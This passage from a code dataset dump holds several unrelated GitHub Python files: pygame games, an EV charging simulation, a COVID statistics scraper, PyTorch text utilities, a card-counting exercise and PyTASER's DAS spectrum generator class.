This creates an image of the\r\n # letters, but does not put it on the screen\r\n text = font.render(\"Sunset\", True, BLACK)\r\n\r\n # Put the image of the text on the screen at 300x250\r\n screen.blit(text, [600, 400])\r\n\r\n # Go ahead and update the screen with what we've drawn.\r\n # This MUST happen after all the other drawing commands.\r\n pygame.display.flip()\r\n\r\n # This limits the while loop to a max of 60 times per second.\r\n # Leave this out and we will use all CPU we can.\r\n clock.tick(60)\r\n\r\n# Be IDLE friendly\r\npygame.quit()","repo_name":"dianacoccoferro/Arcade-Games","sub_path":"Lab_5.py","file_name":"Lab_5.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11634460861","text":"import numpy as np\r\nimport copy \r\nimport pandas as pd\r\nfrom problem_model import problem\r\nimport heapq\r\nimport networkx as nx\r\n\r\n_EPS = 1e-4\r\n\r\n\"\"\"\r\nCharge to maximum required - Travel to other node - Repeat method \r\n\"\"\"\r\nclass CTR(object):\r\n def __init__(self,p):\r\n self.p = p\r\n self.events_heap = []\r\n self.paths = []\r\n self.at = []\r\n self.time = []\r\n self.node_free_charging = [-1 for _ in range(p.n)]\r\n self.ev_events = []\r\n self.current_battery = []\r\n \r\n def get_paths(self):\r\n for i in range(self.p.k):\r\n self.paths.append(nx.shortest_path(self.p.Graphs[i],source=self.p.source_node[i],target=self.p.destination_node[i], weight='weight'))\r\n net_b = self.p.battery_usage_on_path(i,self.paths[-1])\r\n if abs(net_b - self.p.initial_battery[i]) <= _EPS or net_b < self.p.initial_battery[i]:\r\n self.at.append(len(self.paths[-1])-1)\r\n self.time.append(net_b/self.p.discharging_rate[i])\r\n self.ev_events.append([(self.time[-1],f\"reached without charging at destination on path {self.paths[-1]}\")])\r\n continue\r\n\r\n self.at.append(0)\r\n b = self.p.max_battery[i] - self.p.initial_battery[i]\r\n 
self.current_battery.append(self.p.initial_battery[i])\r\n charge_complete_time = min(b,net_b-self.p.initial_battery[i])/self.p.charging_rate[i]\r\n if self.node_free_charging[self.paths[-1][0]] == -1:\r\n self.time.append(0)\r\n self.ev_events.append([(0,f\"started charging at {self.paths[-1][0]}\")])\r\n self.node_free_charging[self.paths[-1][0]] = charge_complete_time\r\n else:\r\n self.time.append(self.node_free_charging[self.paths[-1][0]])\r\n self.ev_events.append([(self.node_free_charging[self.paths[-1][0]],f\"started charging at {self.paths[-1][0]}\")])\r\n self.node_free_charging[self.paths[-1][0]] += charge_complete_time\r\n return\r\n\r\n def set_paths(self,paths):\r\n self.paths = paths\r\n for i in range(self.p.k):\r\n net_b = self.p.battery_usage_on_path(i,self.paths[i])\r\n if abs(net_b - self.p.initial_battery[i]) <= _EPS or net_b < self.p.initial_battery[i]:\r\n self.at.append(len(self.paths[i])-1)\r\n self.time.append(net_b/self.p.discharging_rate[i])\r\n self.ev_events.append([(self.time[-1],f\"reached without charging at destination on path {self.paths[i]}\")])\r\n continue\r\n\r\n self.at.append(0)\r\n b = self.p.max_battery[i] - self.p.initial_battery[i]\r\n self.current_battery.append(self.p.initial_battery[i])\r\n charge_complete_time = min(b,net_b-self.p.initial_battery[i])/self.p.charging_rate[i]\r\n if self.node_free_charging[self.paths[i][0]] == -1:\r\n self.time.append(0)\r\n self.ev_events.append([(0,f\"started charging at {self.paths[i][0]}\")])\r\n self.node_free_charging[self.paths[i][0]] = charge_complete_time\r\n else:\r\n self.time.append(self.node_free_charging[self.paths[i][0]])\r\n self.ev_events.append([(self.node_free_charging[self.paths[i][0]],f\"started charging at {self.paths[i][0]}\")])\r\n self.node_free_charging[self.paths[i][0]] += charge_complete_time\r\n return\r\n\r\n def init_events(self):\r\n for i in range(self.p.k):\r\n if self.at[i]==len(self.paths[i])-1:\r\n continue\r\n net_b = 
self.p.battery_usage_on_path(i,self.paths[i])\r\n b = self.p.max_battery[i] - self.p.initial_battery[i]\r\n charge_complete_time = min(b,net_b-self.p.initial_battery[i])/self.p.charging_rate[i]\r\n self.events_heap.append((self.time[i]+charge_complete_time,i,'charging'))\r\n self.ev_events[i].append((self.time[i]+charge_complete_time,f\"completed charging at {self.paths[i][0]}\"))\r\n heapq.heapify(self.events_heap)\r\n\r\n def run(self):\r\n\r\n self.get_paths()\r\n self.init_events()\r\n\r\n while len(self.events_heap) > 0:\r\n event_complete_time,ev_id,etype = self.events_heap[0]\r\n heapq.heappop(self.events_heap)\r\n\r\n if etype == 'charging':\r\n if abs(self.node_free_charging[self.paths[ev_id][self.at[ev_id]]]-event_complete_time)<=_EPS:\r\n self.node_free_charging[self.paths[ev_id][self.at[ev_id]]]=-1\r\n self.time[ev_id]=event_complete_time\r\n u,v = self.paths[ev_id][self.at[ev_id]],self.paths[ev_id][self.at[ev_id]+1]\r\n edge_travel_time = self.p.time_to_travel(ev_id,(u,v))\r\n heapq.heappush(self.events_heap,(self.time[ev_id]+edge_travel_time,ev_id,'traveling'))\r\n self.ev_events[ev_id].append((self.time[ev_id]+edge_travel_time,f\"reached {v}\"))\r\n elif etype == 'traveling':\r\n self.at[ev_id]+=1\r\n self.time[ev_id]=event_complete_time\r\n if self.at[ev_id]==len(self.paths[ev_id])-1:\r\n continue\r\n\r\n u,v = self.paths[ev_id][self.at[ev_id]-1],self.paths[ev_id][self.at[ev_id]]\r\n\r\n b = self.p.battery_usage_on_path(ev_id,self.paths[ev_id][self.at[ev_id]:])\r\n curr_b = self.p.max_battery[ev_id] - self.p.battery_to_travel(ev_id,(u,v))\r\n if abs(b - curr_b) <= _EPS or b < curr_b:\r\n travel_complete_time = b/self.p.discharging_rate[ev_id]\r\n self.time[ev_id]+=travel_complete_time\r\n self.ev_events[ev_id].append((self.time[ev_id],f\"reached destination on path {self.paths[ev_id][self.at[ev_id]:]}\"))\r\n self.at[ev_id]=len(self.paths[ev_id])-1\r\n continue\r\n \r\n charge_complete_time = 
(min(self.p.max_battery[ev_id]-curr_b,b-curr_b))/self.p.charging_rate[ev_id]\r\n if self.node_free_charging[v] == -1:\r\n # print(ev_id,v,len(self.paths),len(self.paths[ev_id]),len(self.time))\r\n self.events_heap.append((self.time[ev_id]+charge_complete_time,ev_id,'charging'))\r\n self.ev_events[ev_id].append((event_complete_time,f\"started charging at {v}\"))\r\n self.ev_events[ev_id].append((self.time[ev_id]+charge_complete_time,f\"completed charging at {v}\"))\r\n self.node_free_charging[v]=self.time[ev_id]+charge_complete_time\r\n else:\r\n self.events_heap.append((max(self.time[ev_id],self.node_free_charging[v])+charge_complete_time,ev_id,'charging'))\r\n self.ev_events[ev_id].append((self.node_free_charging[v],f\"started charging at {v}\"))\r\n self.ev_events[ev_id].append((max(self.time[ev_id],self.node_free_charging[v])+charge_complete_time,f\"completed charging at {v}\"))\r\n self.node_free_charging[v]=max(self.time[ev_id],self.node_free_charging[v])+charge_complete_time\r\n \r\n heapq.heapify(self.events_heap)\r\n \r\n def print_paths(self):\r\n for i in range(self.p.k):\r\n print(f\"for EV {i} : {self.ev_events[i]}\")\r\n return\r\n\r\np = problem.problem()\r\n\r\np.input(\"gen_testcase.txt\")\r\n\r\np.make_graphs()\r\n\r\nThr_min = p.theoritical_minima()\r\nprint(\"Lower bound is: \",Thr_min,\"\\n\")\r\n\r\nsol = CTR(p)\r\nsol.run()\r\n\r\n# print(sol.time)\r\nprint(\"output of algoritm is: \",np.max(sol.time),\"\\n\")\r\n\r\nprint(\"Paths that are followed are:\\n\")\r\nsol.print_paths()","repo_name":"harshal-dupare/AI61005-term-project","sub_path":"src/ctr.py","file_name":"ctr.py","file_ext":"py","file_size_in_byte":7624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"40359006824","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom db_helper import db_connection\nfrom datetime import date\nimport re\n\n\n\nclass Scrapper():\n def __init__(self):\n 
self.url=\"https://www.mohfw.gov.in/\"\n self.page=requests.get(self.url)\n self.soup=BeautifulSoup(self.page.content,\"html.parser\")\n self.db=db_connection()\n\n def update_general_collection(self,data):\n today = date.today()\n print(\"Today's date \",today)\n db=self.db.get_collection(\"general\")\n returned_data=db.find({\"date\":str(today)},{\"_id\":0})\n empty_ret_data=True\n for _ in returned_data:\n empty_ret_data=False\n break\n\n if(empty_ret_data==False):\n db.update_one({\"date\":str(today)},{\"$set\":{\"active_case\":data[\"active_case\"],\"discharged_case\":data[\"discharged_case\"],\"migrated_case\":data[\"migrated_case\"],\"death_case\":data[\"death_case\"]}})\n else:\n print(\"New day today updating database accordingly !!\")\n db.insert_one(data)\n\n def update_state_collection(self,data):\n db = self.db.get_collection(\"state_wise\")\n for item in data:\n db.update_one({\"state\":item[\"state\"]},{\"$set\":{\"confirmed\":item[\"confirmed\"],\"foreign\":item[\"foreign\"],\"cured/migrated\":item[\"cured/migrated\"],\"death\":item[\"death\"]}})\n\n def general_info(self):\n today = date.today()\n\n content_div=self.soup.find('div',{'class':\"information_row\"})\n info_dict={\n \"date\":str(today),\n \"active_case\":0,\n \"discharged_case\":0,\n \"migrated_case\":0,\n \"death_case\":0\n }\n active_case_div=content_div.find_all('div',{\"class\":\"iblock\"})[1].find(\"div\",{\"class\":\"iblock_text\"})\n active_cases=active_case_div.find(\"span\").text.strip()\n info_dict[\"active_case\"]=int(active_cases)\n\n discharged_case_div=content_div.find_all('div',{\"class\":\"iblock\"})[2].find(\"div\",{\"class\":\"iblock_text\"})\n discharged_cases=discharged_case_div.find(\"span\").text.strip()\n info_dict[\"discharged_case\"]=int(discharged_cases)\n\n migrated_case_div = content_div.find_all('div',{\"class\":\"iblock\"})[4].find(\"div\",{\"class\":\"iblock_text\"})\n migrated_cases = migrated_case_div.find(\"span\").text.strip()\n 
info_dict[\"migrated_case\"] = int(migrated_cases)\n\n death_case_div = content_div.find_all('div',{\"class\":\"iblock\"})[3].find(\"div\",{\"class\":\"iblock_text\"})\n death_cases = death_case_div.find(\"span\").text.strip()\n death_cases_no=re.findall('\\d+', death_cases)\n if(len(death_cases_no)>0):\n info_dict[\"death_case\"] = int(death_cases_no[0])\n\n # print(info_dict)\n self.update_general_collection(info_dict)\n\n\n def state_wise_details(self):\n content_div=self.soup.find('div',{'class':'content newtab'})\n table=content_div.find(\"tbody\")\n\n rows=table.find_all(\"tr\")\n info_arr=[]\n for row in rows:\n columns=row.find_all(\"td\")\n temp_dict={}\n if(len(columns)==6):\n temp_dict[\"state\"]=columns[1].text.strip().replace(\" \",\"\").lower()\n temp_dict[\"confirmed\"]=int(columns[2].text.strip())\n temp_dict[\"foreign\"] = int(columns[3].text.strip())\n temp_dict[\"cured/migrated\"]=int(columns[4].text.strip())\n # temp_dict[\"death\"] = int(columns[5].text.strip())\n death_cases_no = re.findall('\\d+',columns[5].text.strip())\n if (len(death_cases_no) > 0):\n temp_dict[\"death\"] = int(death_cases_no[0])\n info_arr.append(temp_dict)\n\n # print(info_arr)\n self.update_state_collection(info_arr)\n\n\n\n\n\n\n","repo_name":"090max/covid19Tracker_server","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"32304920864","text":"from os import listdir\nimport pandas as pd \nfrom os.path import isfile, join\nimport re \nimport docx\nimport csv\nimport math\nimport torch \nimport numpy as np\ndef entropy(Liste, base):\n \"\"\"\n This function computes the entropy of a list of probabilities, provided a basis.\n \"\"\"\n\n if base == \"natural\":\n return -sum([p * math.log(p) for p in Liste])\n else:\n return (-1.0 / math.log(base)) * sum([p * math.log(p) for p in Liste])\n\n\ndef getText(filename):\n doc = 
docx.Document(filename)\n fullText = []\n for para in doc.paragraphs:\n fullText.append(para.text)\n return '\\n'.join(fullText)\n\ndef segmente(txt):\n chopped = []\n ex = [e for e in set(re.findall(r\"\\[[0-9_]+\\]\", txt)) if len(e)==8]\n labs = [e for e in (re.findall(r\"\\[[0-9_]+\\]\", txt)) if len(e)==8]\n start_id = []\n for e in ex : \n E = e.replace('[','\\[')\n E = E.replace(']','\\]')\n start_id.extend([ m.start() for m in re.finditer(E, txt)])\n start_id.append(len(txt))\n start_id = sorted(start_id)\n for i in range(len(start_id)-1): \n start = start_id[i]+8\n finish = start_id[i+1]\n chopped.append(txt[start:finish])\n return [(clean_text(chopped[i]),labs[i][1:-1]) for i in range(len(chopped))]\n\ndef store_data(code_dict,path):\n with open(join(path,'paragraphs.csv'), 'w', newline='') as csvfile:\n datawriter = csv.writer(csvfile)\n for k in code_dict.keys():\n datawriter.writerow([k,int(code_dict[k][0]),code_dict[k]])\n\n\ndef clean_text(text):\n \n text = text.replace('\\n',' ')\n text = text.replace('\\t',' ')\n\n alphanumeric = re.findall(\"[^œa-zA-ZÀ-ÿ0-9'\\-]\",text)\n for an in alphanumeric:\n text = text.replace(an,' ')\n R = re.findall(\"[ \\t]+\",text)\n if len(R)>0:\n while set(R) != {' '} : \n R = re.findall(\"[ \\t]+\",text)\n for r in R:\n text = text.replace(r,' ')\n\n return text\n\ndef token_list_to_text(token_list):\n text = ''\n for t in token_list:\n text+=t + ' '\n return text[:-1]\n\n\ndef functionize(text,functions_dict,func):\n if func !='NA':\n List = [ t for t in text.split(' ') if t in functions_dict and functions_dict[t] ==func]\n else : \n List = [ t for t in text.split(' ') if t not in functions_dict]\n return token_list_to_text(List)\n\n\ndef save_checkpoint(save_path, model, optimizer, valid_loss):\n\n if save_path == None:\n return\n \n state_dict = {'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'valid_loss': valid_loss}\n \n torch.save(state_dict, save_path)\n 
print(f'Model saved to ==> {save_path}')\n\n\ndef load_checkpoint(load_path, model, optimizer):\n\n if load_path==None:\n return\n \n state_dict = torch.load(load_path, map_location=device)\n print(f'Model loaded from <== {load_path}')\n\n model.load_state_dict(state_dict['model_state_dict'])\n optimizer.load_state_dict(state_dict['optimizer_state_dict'])\n \n return state_dict['valid_loss']\n\n\ndef save_metrics(save_path, train_loss_list, valid_loss_list, global_steps_list):\n\n if save_path == None:\n return\n \n state_dict = {'train_loss_list': train_loss_list,\n 'valid_loss_list': valid_loss_list,\n 'global_steps_list': global_steps_list}\n \n torch.save(state_dict, save_path)\n print(f'Model saved to ==> {save_path}')\n\n\ndef load_metrics(load_path):\n\n if load_path==None:\n return\n \n state_dict = torch.load(load_path, map_location=device)\n print(f'Model loaded from <== {load_path}')\n \n return state_dict['train_loss_list'], state_dict['valid_loss_list'], state_dict['global_steps_list']\n\ndef labels_to_tensors(labels,tensor_size):\n lab= labels.long().tolist()\n tensors = torch.zeros(labels.shape[0],tensor_size)\n for i in range(len(lab)):\n l = lab[i]\n T = torch.zeros(tensor_size)\n T[l-1]+=1\n tensors[i] += T\n return tensors.long()\n\ndef proba_to_class(output):\n pred = []\n for T in output:\n pred.append(T.argmax().item())\n return pred\n \ndef dictionnize(text,noyau,expressions_dict):\n if text != np.nan : \n List = [ t for t in text.split(' ') if t in expressions_dict and expressions_dict[t] == noyau]\n return token_list_to_text(List)\n else : \n return text ","repo_name":"mehdi123dj/PMS","sub_path":"reccurent/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"13248909655","text":"import sys\nsys.stdin = open(\"4047_input.txt\")\n\nT = int(input())\n\nfor tc in range(1,T+1):\n lst = list(' 
'.join(input()).split())\n pattern = {'S': 0, 'D': 1,'H': 2, 'C': 3}\n card = [[0]*14 for _ in range(4)]\n error = 0\n res = [0]*4\n for i in range(0,len(lst),3):\n index_j = int(lst[i+1])*10+int(lst[i+2])\n card[pattern[lst[i]]][index_j] += 1\n if card[pattern[lst[i]]][index_j] == 2:\n error = 1\n break\n else:\n for i in range(4):\n res[i] = 13 - sum(card[i])\n print('#{} '.format(tc),end='')\n if error:\n print('ERROR')\n else:\n print(*res)\n\n","repo_name":"steven9408/Algorithm_Study","sub_path":"SWEA/SSAFY/99_IMtest/4047.py","file_name":"4047.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"38787984855","text":"#!/usr/bin/env python3\n\"\"\"\nCreated on Thu Aug 3 16:42:36 2023\n\n@author: lucasverga\n\"\"\"\n\nimport warnings\n\nimport numpy as np\nfrom pymatgen.io.vasp.inputs import UnknownPotcarWarning\n\nfrom pytaser.internal_abs_generator import Internal_Abs\nfrom pytaser.tas import Das\n\nwarnings.filterwarnings(\"ignore\", category=RuntimeWarning)\n\n\nclass DASGenerator:\n \"\"\"\n Class to generate a DAS spectrum (decomposed and cumulative) from a bandstructure and\n dos object.\n\n Args:\n new_system: Internal_Abs object from internal_abs_generator for the new system\n reference_system: Internal_Abs object from internal_abs_generator for the reference system\n Attributes:\n new_system: Internal_Abs object from internal_abs_generator for the new system\n reference_system: Internal_Abs object from internal_abs_generator for the reference system\n \"\"\"\n\n def __init__(\n self,\n new_system,\n reference_system,\n ):\n self.new_system = new_system\n self.reference_system = reference_system\n\n @classmethod\n def from_vasp_outputs(\n cls,\n vasprun_file_new_system,\n vasprun_file_ref,\n waveder_file_new_system=None,\n waveder_file_ref=None,\n ):\n \"\"\"\n Create a DASGenerator object from VASP output files.\n\n The user should provide the vasprun 
files for the new system and the reference system,\n followed by the waveder files for the new system and the reference system.\n\n Args:\n vasprun_file_new_system: The vasprun.xml file for the new system.\n vasprun_file_ref: The vasprun.xml file for the reference system.\n waveder_file_new_system: The WAVEDER file for the new system.\n waveder_file_ref: The WAVEDER file for the reference system.\n Returns:\n A DASGenerator object containing the Internal_Abs object for the new system and reference system.\n \"\"\"\n warnings.filterwarnings(\"ignore\", category=UnknownPotcarWarning)\n warnings.filterwarnings(\n \"ignore\", message=\"No POTCAR file with matching TITEL fields\"\n )\n\n new_system = Internal_Abs.internal_from_vasp(\n vasprun_file_new_system, waveder_file_new_system\n )\n reference_system = Internal_Abs.internal_from_vasp(\n vasprun_file_ref, waveder_file_ref\n )\n\n return cls(new_system, reference_system)\n\n @classmethod\n def from_mpid(\n cls,\n mpid,\n mpid_ref,\n bg=None,\n bg_ref=None,\n api_key=None,\n mpr=None,\n mpr_ref=None,\n ):\n \"\"\"\n Import the desired bandstructure and dos objects from the legacy Materials Project\n database.\n\n Args:\n mpid: The Materials Project ID of the new system.\n mpid_ref: The Materials Project ID of the reference system.\n bg: The experimental bandgap (eV) of the new system. If None, the band gap\n of the MP calculation will be used.\n bg_ref: The experimental bandgap (eV) of the reference system. 
If None, the band gap\n of the MP calculation will be used.\n api_key: The user's Materials Project API key.\n mpr: An MPRester object for the new system if already generated by user.\n mpr_ref: An MPRester object for the reference system if already generated by user.\n\n Returns:\n A DASGenerator object containing the Internal_Abs object for the new system and reference system.\n \"\"\"\n new_system = Internal_Abs.internal_from_mpid(\n mpid, bg=None, api_key=None, mpr=None\n )\n reference_system = Internal_Abs.internal_from_mpid(\n mpid_ref, bg_ref, api_key=None, mpr_ref=None\n )\n\n return cls(new_system, reference_system)\n\n def generate_das(\n self,\n temp,\n energy_min=0,\n energy_max=5,\n gaussian_width=0.1,\n cshift=None,\n step=0.01,\n new_sys_occs=None,\n ref_occs=None,\n processes=None,\n ):\n \"\"\"\n Generates DAS spectra (new system - reference system) based on inputted occupancies,\n and a specified energy mesh. If the DASGenerator has not been generated from VASP\n outputs (and thus does not have a dfc attribute), then the output DAS is generated\n using the change in joint density of states (JDOS) from both systems, with no consideration\n of oscillator strengths. Otherwise, the output DAS is generated considering all contributions\n to the predicted DAS spectrum.\n\n Args:\n temp: Temperature (K) of material we wish to investigate (affects the FD distribution)\n energy_min: Minimum band transition energy to consider for energy mesh (eV)\n energy_max: Maximum band transition energy to consider for energy mesh (eV)\n gaussian_width: Width of gaussian curve\n cshift: Complex shift in the Kramers-Kronig transformation of the dielectric function\n (see https://www.vasp.at/wiki/index.php/CSHIFT). If not set, uses the value of\n CSHIFT from the underlying VASP WAVEDER calculation. 
(only relevant if the\n DASGenerator has been generated from VASP outputs)\n step: Interval between energy points in the energy mesh.\n new_sys_occs: Optional input parameter for occupancies of the new system, otherwise\n automatically calculated based on input temperature (temp)\n reference_occs: Optional input parameter for occupancies of the reference system, otherwise\n automatically calculated based on input temperature (temp)\n processes: Number of processes to use for multiprocessing. If not set, defaults to one\n less than the number of CPUs available.\n\n Returns:\n DAS class containing the following inputs;\n - das_total: overall deltaT DAS spectrum for new system - reference system.\n - jdos_new_sys_total: overall JDOS for the new system.\n - jdos_new_sys_if: JDOS for the new system across the energy mesh for a specific band\n transition i (initial) -> f (final) [dict]\n - jdos_ref_total: overall JDOS for the reference system.\n - jdos_ref_if: JDOS for the reference system across the energy mesh for a specific band\n transition i (initial) -> f (final) [dict]\n - energy_mesh_ev: Energy mesh of spectra in eV, with an interval of 'step'.\n - bandgap: Bandgap of the system, in eV, rounded to 2 decimal points\n - temp: Temperature of the system, in K\n - alpha_ref: Absorption coefficient of the reference system, in cm^-1 (only\n calculated if the DASGenerator has been generated from VASP outputs)\n - alpha_new_sys: Absorption coefficient of the new system, in cm^-1 (only\n calculated if the DASGenerator has been generated from VASP outputs\n - weighted_jdos_diff_if: JDOS difference (from reference to new system) across the energy\n mesh for a specific band transition i (initial) -> f (final), weighted by the\n oscillator strength of the transition [dict]\n - weighted_jdos_new_sys_if: JDOS of new system across the energy mesh for a specific band\n transition i (initial) -> f (final), weighted by the oscillator strength of\n the transition [dict]\n \"\"\"\n 
bandgap_ref = round(\n self.reference_system.bs.get_band_gap()[\"energy\"], 2\n )\n bandgap_new_sys = round(self.new_system.bs.get_band_gap()[\"energy\"], 2)\n\n energy_mesh_ev = np.arange(energy_min, energy_max, step)\n\n (\n jdos_ref_total,\n jdos_ref_if,\n alpha_ref,\n weighted_jdos_ref_if,\n ) = Internal_Abs.generate_abs(\n self.reference_system,\n temp,\n energy_min,\n energy_max,\n gaussian_width,\n cshift,\n step,\n ref_occs,\n processes,\n )\n\n (\n jdos_new_sys_total,\n jdos_new_sys_if,\n alpha_new_sys,\n weighted_jdos_new_sys_if,\n ) = Internal_Abs.generate_abs(\n self.new_system,\n temp,\n energy_min,\n energy_max,\n gaussian_width,\n cshift,\n step,\n new_sys_occs,\n processes,\n )\n\n das_total = jdos_new_sys_total - jdos_ref_total\n # need to interpolate alpha arrays onto JDOS energy mesh:\n if self.reference_system.dfc and self.new_system.dfc is not None:\n das_total = alpha_new_sys - alpha_ref\n\n return Das(\n das_total,\n jdos_new_sys_total,\n jdos_new_sys_if,\n jdos_ref_total,\n jdos_ref_if,\n energy_mesh_ev,\n bandgap_new_sys,\n bandgap_ref,\n temp,\n alpha_new_sys if self.new_system.dfc is not None else None,\n alpha_ref if self.reference_system.dfc is not None else None,\n weighted_jdos_new_sys_if\n if self.new_system.dfc is not None\n else None,\n weighted_jdos_ref_if\n if self.reference_system.dfc is not None\n else None,\n )\n","repo_name":"WMD-group/PyTASER","sub_path":"pytaser/das_generator.py","file_name":"das_generator.py","file_ext":"py","file_size_in_byte":9544,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"33"} +{"seq_id":"25959046775","text":"import pygame\nimport random\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\nSCREEN_MARGIN = 5\nCOLLISION = 100\n\n\ndef isCollision(x1, y1, x2, y2):\n dx = x1 - x2\n dy = y1 - y2\n dist = dx*dx + dy*dy\n if dist <= COLLISION:\n return True\n return False\n\n\nclass Character:\n def __init__(self):\n self.name = \"player\"\n self.sprite = None\n 
self.sprite_w = 0\n self.sprite_h = 0\n self.coord_X = 0\n self.coord_Y = 0\n self.speed_X = 0.5\n self.speed_Y = 0.5\n\n def set(self, name, sprite, sprite_width, sprite_height, x, y, speed_X=0.5, speed_Y=0.5):\n self.name = name\n self.sprite = sprite\n self.sprite_w = sprite_width\n self.sprite_h = sprite_height\n self.coord_X = x\n self.coord_Y = y\n self.speed_X = speed_X\n self.speed_Y = speed_Y\n\n def set_random_coordinated(self, x_min, x_max, y_min, y_max):\n self.coord_X = random.randint(x_min, x_max)\n self.coord_Y = random.randint(y_min, y_max)\n\n def move(self, dx=0.0, dy=0.0):\n self.coord_X += dx\n self.coord_Y += dy\n\n def draw(self, screen):\n screen.blit(self.sprite, (self.coord_X, self.coord_Y))\n\n\nclass SpaceInvaders:\n def __init__(self):\n # Initialize pygame\n pygame.init()\n\n # Set screen\n self.screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n\n # Set title\n pygame.display.set_caption(\"Space Invaders\")\n icon = pygame.image.load(\"sprites/spaceship.png\")\n pygame.display.set_icon(icon)\n\n # Set score\n self.score_value = 0\n\n # Set Clock\n self.clock = pygame.time.Clock()\n\n # Set player\n sprite = pygame.image.load(\"sprites/playership.png\")\n p_w, p_h = sprite.get_rect().size\n self.player = Character()\n self.player.set(\"spaceship\", sprite, p_w, p_h, SCREEN_WIDTH / 2 - p_w / 2,\n SCREEN_HEIGHT - p_h - p_h / 2, speed_X=6)\n\n # Set bullet\n # sprite = pygame.image.load(\"sprites/rocket.png\")\n sprite = pygame.image.load(\"sprites/rocket_16_x_16.png\")\n p_w, p_h = sprite.get_rect().size\n self.rocket = Character()\n self.rocket.set(\"rocket\", sprite, p_w, p_h, SCREEN_WIDTH / 2 - p_w / 2,\n SCREEN_HEIGHT - p_h - p_h / 2, speed_Y=-10)\n\n # Set enemy\n self.enemy = []\n self.enemy_fleet = 1\n for i in range(self.enemy_fleet):\n self.enemy.append(self.create_enemy())\n\n # Set background\n self.background = pygame.image.load(\"sprites/universe.png\")\n\n def set_text_info(self):\n font = 
pygame.font.Font(\"freesansbold.ttf\", 16)\n score = font.render(\"Score : \" + str(self.score_value), True, (200, 0, 0))\n enemy_fleet = font.render(\"Enemy Fleet : \" + str(self.enemy_fleet), True, (200, 0, 0))\n self.screen.blit(score, (10, 10))\n self.screen.blit(enemy_fleet, (10, 30))\n\n def game_over(self):\n font = pygame.font.Font(\"freesansbold.ttf\", 32)\n r = random.randint(0, 255)\n g = random.randint(0, 255)\n b = random.randint(0, 255)\n game_over = font.render(\"Game Over!\", True, (r, g, b))\n restart = font.render(\"Press r to restart...\", True, (r, g, b))\n self.screen.blit(game_over, (SCREEN_WIDTH / 2 - 32, 10))\n self.screen.blit(restart, (SCREEN_WIDTH / 2 - 32, 40))\n\n def create_enemy(self):\n sprite = pygame.image.load(\"sprites/spaceship_rot_180.png\")\n p_w, p_h = sprite.get_rect().size\n enemy = Character()\n speed_X = random.randint(1, 3)\n speed_Y = random.randint(10, 30)\n enemy.set(\"enemyship\", sprite, p_w, p_h, 0, 0, speed_X=speed_X, speed_Y=speed_Y)\n enemy.set_random_coordinated(SCREEN_MARGIN, SCREEN_WIDTH - SCREEN_MARGIN - enemy.sprite_w - 1, 50, 150)\n return enemy\n\n def exec(self):\n # Set the main loop\n running = True\n fire = False\n render = True\n rockdiv = self.player.sprite_w / self.rocket.sprite_w\n dx = 0\n dy = 0\n key_pressed = {\"K_LEFT\": False, \"K_RIGHT\": False}\n while running:\n self.screen.fill((0, 0, 0))\n self.screen.blit(self.background, (0, 0))\n\n # Player Movement\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n dx = -self.player.speed_X\n key_pressed[\"K_LEFT\"] = True\n elif event.key == pygame.K_RIGHT:\n dx = self.player.speed_X\n key_pressed[\"K_RIGHT\"] = True\n elif event.key == pygame.K_SPACE:\n fire = True\n elif event.key == pygame.K_r:\n render = True\n self.score_value = 0\n self.enemy = []\n self.enemy_fleet = 1\n for i in range(self.enemy_fleet):\n 
self.enemy.append(self.create_enemy())\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n dx = 0\n key_pressed[\"K_LEFT\"] = False\n if key_pressed[\"K_RIGHT\"]:\n dx = self.player.speed_X\n elif event.key == pygame.K_RIGHT:\n dx = 0\n key_pressed[\"K_RIGHT\"] = False\n if key_pressed[\"K_LEFT\"]:\n dx = -self.player.speed_X\n\n if 5 <= self.player.coord_X <= SCREEN_WIDTH - SCREEN_MARGIN - self.player.sprite_w:\n self.player.move(dx=dx, dy=dy)\n elif self.player.coord_X <= SCREEN_MARGIN:\n self.player.coord_X = SCREEN_MARGIN\n elif self.player.coord_X >= SCREEN_WIDTH - SCREEN_MARGIN - self.player.sprite_w:\n self.player.coord_X = SCREEN_WIDTH - SCREEN_MARGIN - self.player.sprite_w\n\n if fire:\n self.rocket.coord_Y += self.rocket.speed_Y\n if self.rocket.coord_Y <= SCREEN_MARGIN:\n fire = False\n self.rocket.coord_X = self.player.coord_X + self.player.sprite_w / rockdiv + \\\n self.rocket.sprite_w / 2\n self.rocket.coord_Y = self.player.coord_Y + self.player.sprite_h / rockdiv\n else:\n self.rocket.coord_X = self.player.coord_X + self.player.sprite_w / rockdiv + self.rocket.sprite_w / 2\n self.rocket.coord_Y = self.player.coord_Y + self.player.sprite_h / rockdiv\n\n # Enemy Movement\n for i in range(self.enemy_fleet):\n self.enemy[i].coord_X += self.enemy[i].speed_X\n if SCREEN_WIDTH - SCREEN_MARGIN - self.enemy[i].sprite_w <= self.enemy[i].coord_X or \\\n SCREEN_MARGIN >= self.enemy[i].coord_X:\n self.enemy[i].speed_X *= -1\n self.enemy[i].coord_Y += self.enemy[i].speed_Y\n\n if isCollision(self.enemy[i].coord_X + self.enemy[i].sprite_w / 2,\n self.enemy[i].coord_Y + self.enemy[i].sprite_h / 2,\n self.player.coord_X + self.player.sprite_w / 2, self.player.coord_Y):\n render = False\n\n if isCollision(self.enemy[i].coord_X + 